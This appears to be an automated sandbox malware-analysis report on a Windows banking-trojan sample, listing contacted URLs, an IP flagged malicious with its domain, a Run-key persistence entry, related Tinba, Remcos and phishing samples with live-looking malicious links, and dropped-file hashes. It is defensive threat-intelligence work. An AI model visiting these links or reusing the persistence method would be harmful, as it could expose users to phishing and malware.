          https://outlook.comeexplorer.exe, 00000004.00000003.2981503378.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981993470.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000C048000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000004.00000003.2979250085.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2196219993.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2979898080.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076151253.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076523652.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3450962269.000000000C4BD000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://fb.me/react-polyfillsSearchApp.exe, 0000000D.00000000.2302447567.0000027A80400000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://aefd.nelreports.net/api/report?cat=bingrmsSearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://substrate.office.com/SubstrateSearch-Internal.ReadWriteSearchApp.exe, 0000000D.00000000.2286028809.0000027A7E508000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com/explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://assets.activity.windows.comsvchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/de-ch/play/games/archery-king/cg-9n5gkc4t7lzz"SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817"SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://activity.windows.comsvchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://outlook.office.com/M365.Access394866fc-eedb-4f01-8536-3ff84b16be2a72f988bf-86f1-41af-91ab-2dSearchApp.exe, 0000000D.00000000.2325343319.0000027A916C8000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com:443/en-us/feedexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1"SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-eiexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.activity.windows.com/v1/assets/$batchsvchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://%s.dnet.xboxlive.comsvchost.exe, 00000006.00000000.2219376900.000001A798065000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://fb.me/react-polyfillsThisSearchApp.exe, 0000000D.00000000.2281804728.0000027A7DEF0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://xsts.auth.xboxlive.com/svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          216.218.185.162
          lkebgoxdejyq.comUnited States
          6939HURRICANEUStrue
          173.222.162.64
          unknownUnited States
          35994AKAMAI-ASUSfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1501381
          Start date and time:2024-08-29 20:35:06 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 8m 31s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:11
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:30
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Uredospore8.exe
          Detection:MAL
          Classification:mal100.bank.evad.winEXE@13/15@2/2
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 87%
          • Number of executed functions: 136
          • Number of non-executed functions: 113
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 192.229.221.95
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: Uredospore8.exe
          TimeTypeDescription
          14:36:11API Interceptor1x Sleep call for process: dllhost.exe modified
          14:36:14API Interceptor507x Sleep call for process: explorer.exe modified
          20:36:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run E6B93DA9 C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe
          20:36:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run E6B93DA9 C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          216.218.185.1627Y18r(201).exeGet hashmaliciousTinbaBrowse
          • elitiorecfreetoo.cc/el0hjkd76ghs65dhj0it/
          bX77X1kv3X.exeGet hashmaliciousTinbaBrowse
          • elitiorecfreetoo.cc/el0hjkd76ghs65dhj0it/
          RgZaLjgCto.exeGet hashmaliciousTinbaBrowse
          • sotdecjvilon.pw/EiDQjNbWEQ/
          java.exeGet hashmaliciousTinbaBrowse
          • gfnlmtcolrrb.pw/EiDQjNbWEQ/
          java.exeGet hashmaliciousTinbaBrowse
          • fccfxejgtpqb.pw/EiDQjNbWEQ/
          PrintWiz.exeGet hashmaliciousTinbaBrowse
          • pxscpwnnqujq.net/el0hjkd76ghs65dhj0it/
          java.exeGet hashmaliciousTinbaBrowse
          • cmnsgscccrej.pw/EiDQjNbWEQ/
          3G36K54KKw.exeGet hashmaliciousTinbaBrowse
          • ve0t182er814kok.cc/vet0up7gj67sdhjd17up0er/
          http://hbjtorutqkl.orgGet hashmaliciousUnknownBrowse
          • hbjtorutqkl.org/
          http://www.paypr.comGet hashmaliciousUnknownBrowse
          • www.paypr.com/
          173.222.162.64r1kArkKGjW.exeGet hashmaliciousSalityBrowse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            www.google.comhttps://www.estampariaimagemeacao.com.br/js/images/tvavx.php?7-797967704b5369323074665079536e4f53696c4e536374495330724e4c4d38764c386f734d6741436f367a554c434d6a45304e446f2f4c537a4879396773543031474b396c4e51796651413d-cGllcnBvbnRAdW1jdS5vcmcN&c=E,1,wbWD82FzAB2JeezUv_orUrFt9Y6xAwP1SFd-LxGbn5lFQUR-ICnh2bVD8KxUbI-o1WHs4m_jH3oIrcrCtckuIPjOPE2z7IJMic3gcfP66riD2fyrofyEXyw,&typo=1Get hashmaliciousHTMLPhisherBrowse
            • 216.58.206.68
            http://my.manychat.com/Get hashmaliciousUnknownBrowse
            • 216.58.206.68
            https://cvccworks-my.sharepoint.com/:o:/g/personal/tbrosseau_cvccworks_edu/Eq-UyPVcAplCp0EtULhG-vgBSBG-0YnvqRHIOFaj8gAVeA?e=0GtZle&c=E,1,DChFGbEapD80-9FdFFEzIgnps7b6noVGZQKGJYQxe5NZ1bO4xoHQSXTZoDZYFQom26YXPkpXr4g-Zcy6HwaX1DHyE-5Bk2WBwo9od82Z27DPdBWYzulyG2zvnA,,&typo=1Get hashmaliciousHTMLPhisherBrowse
            • 172.217.23.100
            https://cx.surveysensum.com/fd3ButxpGet hashmaliciousUnknownBrowse
            • 172.217.18.100
            http://idtyvfyfmst.weebly.comGet hashmaliciousHTMLPhisherBrowse
            • 142.250.185.132
            http://getquckbulck.topGet hashmaliciousUnknownBrowse
            • 142.250.184.228
            https://outbound.knectit.co.uk/u/click?_t=bnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMwd2ZlL3RzZmxzcHgvNjYxNHNmb3NmeHQvZm9qbmJnM29wbzAwO3RxdXVpGet hashmaliciousUnknownBrowse
            • 216.58.206.68
            http://passtcnet.homeunix.com/amj/2.mp4Get hashmaliciousUnknownBrowse
            • 216.58.212.132
            https://sgsconsulting.com/Get hashmaliciousUnknownBrowse
            • 142.250.185.100
            New Document from Community Insurance Center.htmlGet hashmaliciousHTMLPhisherBrowse
            • 142.250.185.68
            fp2e7a.wpc.phicdn.netRqYh.exeGet hashmaliciousRemcosBrowse
            • 192.229.221.95
            adbce.exeGet hashmaliciousAZORult, Quasar, RamnitBrowse
            • 192.229.221.95
            http://my.manychat.com/Get hashmaliciousUnknownBrowse
            • 192.229.221.95
            SecuriteInfo.com.Win64.MalwareX-gen.10229.1578.exeGet hashmaliciousUnknownBrowse
            • 192.229.221.95
            http://idtyvfyfmst.weebly.comGet hashmaliciousHTMLPhisherBrowse
            • 192.229.221.95
            http://getquckbulck.topGet hashmaliciousUnknownBrowse
            • 192.229.221.95
            http://passtcnet.homeunix.com/amj/2.mp4Get hashmaliciousUnknownBrowse
            • 192.229.221.95
            https://sgsconsulting.com/Get hashmaliciousUnknownBrowse
            • 192.229.221.95
            http://idtyvfyfmst.weebly.comGet hashmaliciousHTMLPhisherBrowse
            • 192.229.221.95
            http://www.water-filter.comGet hashmaliciousHTMLPhisherBrowse
            • 192.229.221.95
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            HURRICANEUSSecuriteInfo.com.Linux.Siggen.9999.11438.19201.elfGet hashmaliciousMiraiBrowse
            • 23.175.182.5
            https://monogogo.info/JQJMLAWN#em=npaladino@bigge.comGet hashmaliciousPhisherBrowse
            • 66.220.23.67
            KKveTTgaAAsecNNaaaa.x86_64.elfGet hashmaliciousUnknownBrowse
            • 66.160.179.114
            xWTju4vS5WGet hashmaliciousMiraiBrowse
            • 65.19.140.221
            botx.mips.elfGet hashmaliciousMiraiBrowse
            • 184.75.246.154
            6df55c9e31fGet hashmaliciousUnknownBrowse
            • 72.52.87.65
            Account Statement #U2713 PC - ID 30781-20733-1691072748.htmGet hashmaliciousUnknownBrowse
            • 64.62.174.128
            7Y18r(201).exeGet hashmaliciousTinbaBrowse
            • 216.218.185.162
            JH1uPRWzzE.exeGet hashmaliciousRemcosBrowse
            • 216.218.135.118
            GU7Uk4pAQw.elfGet hashmaliciousUnknownBrowse
            • 65.49.39.194
            AKAMAI-ASUShttps://cvccworks-my.sharepoint.com/:o:/g/personal/tbrosseau_cvccworks_edu/Eq-UyPVcAplCp0EtULhG-vgBSBG-0YnvqRHIOFaj8gAVeA?e=0GtZle&c=E,1,DChFGbEapD80-9FdFFEzIgnps7b6noVGZQKGJYQxe5NZ1bO4xoHQSXTZoDZYFQom26YXPkpXr4g-Zcy6HwaX1DHyE-5Bk2WBwo9od82Z27DPdBWYzulyG2zvnA,,&typo=1Get hashmaliciousHTMLPhisherBrowse
            • 184.28.89.164
            https://outbound.knectit.co.uk/u/click?_t=bnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMwd2ZlL3RzZmxzcHgvNjYxNHNmb3NmeHQvZm9qbmJnM29wbzAwO3RxdXVpGet hashmaliciousUnknownBrowse
            • 23.197.9.160
            file.exeGet hashmaliciousUnknownBrowse
            • 23.223.209.213
            http://www.water-filter.comGet hashmaliciousHTMLPhisherBrowse
            • 23.216.205.249
            https://rebrand.ly/340957Get hashmaliciousUnknownBrowse
            • 2.19.126.211
            SecuriteInfo.com.Linux.Siggen.9999.6015.2041.elfGet hashmaliciousMiraiBrowse
            • 23.9.6.205
            file.exeGet hashmaliciousUnknownBrowse
            • 23.223.209.207
            OJO!!! No lo he abiertoFwd_ Message From 646___xbx2.emlGet hashmaliciousUnknownBrowse
            • 2.19.126.151
            https://eu-files.jotform.com/jufs/Balciunas/form_files/mayeri.66cdabd2a5f975.43943309.pdf?md5=MSrOXntTEwGBrCuETzXGIw&expires=1724764002Get hashmaliciousUnknownBrowse
            • 23.47.168.24
            https://netorgft2865359-my.sharepoint.com/:w:/g/personal/paula_inspectpacificnorthwest_com/EXL0GdLzCipEl-iSFFMt7pcBeQ1wBcmGHhi03qs1BFCH1A?e=bI7Q02Get hashmaliciousHTMLPhisherBrowse
            • 23.210.123.218
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            1138de370e523e824bbca92d049a3777http://my.manychat.com/Get hashmaliciousUnknownBrowse
            • 173.222.162.64
            http://getquckbulck.topGet hashmaliciousUnknownBrowse
            • 173.222.162.64
            http://idtyvfyfmst.weebly.comGet hashmaliciousHTMLPhisherBrowse
            • 173.222.162.64
            sxs.exeGet hashmaliciousUnknownBrowse
            • 173.222.162.64
            http://general72.s3-website.us-east-2.amazonaws.comGet hashmaliciousUnknownBrowse
            • 173.222.162.64
            http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
            • 173.222.162.64
            https://gocloud.co.ke/ShareDocu.php/?email=cmFjaGVsakBjb21wbHl3b3Jrcy5jb20=Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
            • 173.222.162.64
            https://set.page/cdtautomotive/Get hashmaliciousUnknownBrowse
            • 173.222.162.64
            Invoice.htmGet hashmaliciousHTMLPhisherBrowse
            • 173.222.162.64
            https://tinyurl.com/NDCEuropeGet hashmaliciousUnknownBrowse
            • 173.222.162.64
            No context
            Process:C:\Windows\System32\svchost.exe
            File Type:data
            Category:modified
            Size (bytes):197760
            Entropy (8bit):4.866785967822446
            Encrypted:false
            SSDEEP:3072:fGNZuHktDm5NZvtDm0HqA98hQwtX9eCLNZZ:f2
            MD5:B57284F9565D4A17842059AE3BC3F54F
            SHA1:7DDBD4594B6A2CACE6C345D9801A12E14981CE0B
            SHA-256:DD486716CAC9303A7615528E92FD021ECEA82600605CF1FAACC3F9E63C9E16EA
            SHA-512:1949FC5BCACF7F4D3AB00699F4CF43C2B16B9FD53ECB66160468B1B10974314B3486A118B3CADC48C9C8D7CC7241DE79A9B2FB73D6CBB39B9A566443A32D7813
            Malicious:false
            Preview:........N..g#.M.p..N..z......v..l.c.Z.Q.H.?.................z.q.h._.V.M.D.;.2.). ...................................~.u.....................................y.p.g.^.U.L.C.:.1.(.............6.-.$.........................}.t.k.b.Y.P.G.>.5...........,.#...........................v..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\System32\dllhost.exe
            File Type:data
            Category:dropped
            Size (bytes):524288
            Entropy (8bit):2.357495641270052
            Encrypted:false
            SSDEEP:1536:jG5pG9g1Ui91X2dQlp6gOnrJOnoeOQ2fQdDQX2khHB1eO5o4QOGSvmNzHr1u:jG5qg1Ui91X2M6tnrQnvu1R5LfvyH
            MD5:04F8FAF99879D22CE27F3C57EFD94D66
            SHA1:EC30A8F6A6411D858B13BC2B323274AD30B4B761
            SHA-256:912C9D680D5F75E8FFA3D5A1321B6B7D0D3133AF40F679062635718886CA298D
            SHA-512:27DE687E0F36B360191E8129A8578BE080BC867A8A3A987D7A0DA63EB963B328AD338FC92DD287579C2AD3C3832D1DDB5B19B4B798C3E7797335E83A5CC9A3D1
            Malicious:false
            Preview:...............+...{o..!...{..........<...T.;....{..................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..........................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\...........................................................................................................................................................................................................0u.............................................y..............Tz+.#......... ..........Y.......h.z.......x.......gN;....{..................C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t......................................................................................................................
            Process:C:\Windows\System32\dllhost.exe
            File Type:Extensible storage user DataBase, version 0x620, checksum 0x813b72d3, page size 32768, DirtyShutdown, Windows version 10.0
            Category:dropped
            Size (bytes):17301504
            Entropy (8bit):1.0289497054122378
            Encrypted:false
            SSDEEP:6144:bvQPYV7AyUO+xBGA611GJxBGA611Gv0M6JwX3XX35X3khTAdhTA/hTATX3t8nMkP:QyUv3F0TmT0TAivKxK/UdOC4Ago
            MD5:BEA789C0FB745AD5A88DEDE66AA1ACD9
            SHA1:0A983EC0588FF60B769F9F7A7328BFF9887ACC32
            SHA-256:B5AC0D7A54C894EA50A53619F74797E439466F035DECFAB427CF38323D94FA2F
            SHA-512:893C6385EB57EEB534A7A9BDFC742F3256FE41325EEAAB92698BF44032535B54C6D971EA609FA43368A622BE8CA3DE450BE002C5FABCA34EB9ADFC0A583C656A
            Malicious:false
            Preview:.;r.... .......4.........gN;....{........................&....../...{...$...|..h.(.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{..................................J=.2.$...|......................$...|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\System32\dllhost.exe
            File Type:data
            Category:dropped
            Size (bytes):16384
            Entropy (8bit):0.1339377237772169
            Encrypted:false
            SSDEEP:6:5l//uuB4tZ9+mAuHcvqUA//AL9wjXlFkFRFlYC0p23nGC:7//uuOUmAcUA//fLlePFlYC1
            MD5:ECA2A2478094DD50C5B3688BC76A4810
            SHA1:DA5CA8E560313F942D5CA6382A7F106098884018
            SHA-256:33B233E1EA588F5826801D886405A9C5A0FC46A26B0BCE6CA04CF6955648E031
            SHA-512:7549EBDDDF3CE2D9F01EBA850DD1251A1DEC0908D2DD9E6B1369CC76114A948336602B12E907F8FE2A46ADAE03CD0842D13A63081C849E9211C9399AE8E50D1D
            Malicious:false
            Preview:.@......................................;....{...$...|.../...{...........$...|.../...{..J=.2.$...|..................m....$...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            File Type:data
            Category:dropped
            Size (bytes):312
            Entropy (8bit):6.6601655582141035
            Encrypted:false
            SSDEEP:6:zYDnUpUGgtzgX5o7IpP/pUGlgn4zSEcbcrwT53aOhDsmTUuAaC:c6nX5FmnPbbDzUiC
            MD5:8CB9827076979C302C958D9FFA0BE384
            SHA1:2FB4F94A67AA32AAEC9388FD0EC12D54DD382901
            SHA-256:3CCD3133AE1D81268CB85059E3CC7626E4301D6D894CF736A5BBEE07E04EA981
            SHA-512:1A4C67EA85661879EF5A28EB177C79D86114B50D0C6385676E1BD81760E463CB879C878572C1D45C87F105FF0E986086AE59E6200D56B9AA8268BCB6A3AA8BBE
            Malicious:false
            Preview:0..4......-0..)..+.....0......0...0........H.....6A..cib).K...20240828213503Z0s0q0I0...+..........G+~..w.#.....W.....H.....6A..cib).K....9=H..BZ|..........20240828213503Z....20240904213503Z0...*.H.=....g.0d.0?.wR.=@...`.P..4G...g..).ld.o. Ln....7...r..pH..0e..3.....b....m.H.l...%..f ^....0.;......:%BDTP-
            Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            File Type:data
            Category:dropped
            Size (bytes):400
            Entropy (8bit):3.9727768533118155
            Encrypted:false
            SSDEEP:6:kKsUNBcc7ih/o8XLNfOAUMivhClroFp736ZWx8GrZoAK+SosEwmPcbLOarUuJn:979yjbNmxMiv8sFpT6er+OwmUeeL
            MD5:B0141F21FCEDEEE039EA324BF6BD54F7
            SHA1:C8BE931970AEF1694B3CD2047A83E27E55B3936B
            SHA-256:18A7DFA3FDF07B40CF0DF4008E915C74E206AC5C530DBAE2F04D3FB3882B9A97
            SHA-512:7C22466D46FE4AD390DB685694FB2F4C80A8619464A478B59D57BC5E423CA44AB47791226E3723E52321145D80EED6EFC56BA5BE87E90EDCDBDED7E4B4079186
            Malicious:false
            Preview:p...... ........,..RB...(.................F$......*M......................*M.... ...........5... ...............8...h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.r.j.r.y.d.R.y.t.%.2.B.A.p.F.3.G.S.P.y.p.f.H.B.x.R.5.X.t.Q.Q.U.s.9.t.I.p.P.m.h.x.d.i.u.N.k.H.M.E.W.N.p.Y.i.m.8.S.8.Y.C.E.A.I.5.P.U.j.X.A.k.J.a.f.L.Q.c.A.A.s.O.1.8.o.%.3.D...
            Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            File Type:Unicode text, UTF-8 text, with very long lines (46777), with no line terminators
            Category:dropped
            Size (bytes):46787
            Entropy (8bit):5.029975757081771
            Encrypted:false
            SSDEEP:768:ugSmLA70brltXp6t1bYyldTYSWeaG05AqC:ugSiVq
            MD5:0D8BF8D92E6F92E7999EA2557DC864FA
            SHA1:762E3905BAEF0351A173A28EE68D77E424D0EA3F
            SHA-256:A85890A5BB568983BE69A2066A08A70FDE1CDB54618CDF286AB147AF912215FA
            SHA-512:942E9A3869B66C60FE1A060502E4FFBE4A29C27DC04E216886249B7970314A8C28461AA378363C5C7B4EC4A753470861045EF6A1B464E8E62E0A4707A69C2A45
            Malicious:false
            Preview:<root><item name="eventLogQueue_Online" value="[]" ltime="1328467908" htime="31128139" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1696486689403" ltime="3067956944" htime="31061843" /><item name="eventLogQueue_Online_uploadedLogSizeInInterval" value="0" ltime="3067958019" htime="31061843" /><item name="newUsersLogged" value="1" ltime="475910539" htime="31061844" /><item name="cohortProfile" value="[{&quot;date&quot;:null,&quot;count&quot;:0},{&quot;date&quot;:null,&quot;count&quot;:0},{&quot;date&quot;:null,&quot;count&quot;:0},{&quot;date&quot;:null,&quot;count&quot;:0},{&quot;date&quot;:null,&quot;count&quot;:0},{&quot;date&quot;:null,&quot;count&quot;:0},{&quot;date&quot;:null,&quot;count&quot;:0},{&quot;date&quot;:null,&quot;count&quot;:0},{&quot;date&quot;:null,&quot;count&quot;:0},{&quot;date&quot;:null,&quot;count&quot;:0},{&quot;date&quot;:null,&quot;count&quot;:0},{&quot;date&quot;:null,&quot;count&quot;:0},{&quot;date&quot;:null,&quot;count&quot;:0},
            Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            File Type:Unicode text, UTF-8 text, with CRLF line terminators
            Category:dropped
            Size (bytes):37172
            Entropy (8bit):4.611586117106773
            Encrypted:false
            SSDEEP:768:6UjQxwcuyEZDqRRmJHGHWy84ye0EaFHm2iLfOXYcc2jZ:b6y5U0Jky4yed+vUfOoujZ
            MD5:CB72E7C0DB487BF29ED4E057EB202FED
            SHA1:1BE1CE4D77688E02AEE53617D201B2A425A660C7
            SHA-256:23321B90885C63CE1F098CC2220E36462A7050CC2D722FB1FE799982305FE1CA
            SHA-512:FECE29D5E5D4BC448EC1CAD726A7FF3CAB733A07DBA8221253D7F2D08258B6F549F783339C8F46147C2F94AF1F9545877D6C961245DC0274ED050281269206AC
            Malicious:false
            Preview:0.0....~.....~.....~.....~.....~.....~...~.....~.....~.....~.......~......~.......~.....~.....~.....~.....~......~.....~......~......~.......~.....~......~.....~.......~.......~......~.....~......~.......~.....~......~.....~.....~......~......~.....~......~.....~.............~.......~...md~...alc~..zune~..zord~..znip~..zip help~..zip file manager~..yourphone~..your phone~..yhis pc~..y pc~..y computer~..xxbox~..xox~..xontrol panel~..xonreol~..xnox~..xnipping~..xms~..xmd~..xls:wux:xls~..xhrome~..xcontrol~..xcmd~..xchrome~..xcalc~..xbxox~..xbv~..xbpx~..xboz~..xbox~..xboxx~..xboxc~..xbos~..xbop~..xboox~..xboix~..xboc~..xbob~..xbix~..xbb~..xamera~..xalc~..x86)~..x64)~..x box~..wyc~..wxcwl~..wxcel~..wword~..wsord~..wsnip~..wrord~..wrod~..wrodpad~..wqord~..wprd~..wprdpad~..wpord~..wowrd~..wotrd~..wotd~..wo
            Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):5
            Entropy (8bit):2.321928094887362
            Encrypted:false
            SSDEEP:3:Dy:W
            MD5:34BD1DFB9F72CF4F86E6DF6DA0A9E49A
            SHA1:5F96D66F33C81C0B10DF2128D3860E3CB7E89563
            SHA-256:8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C
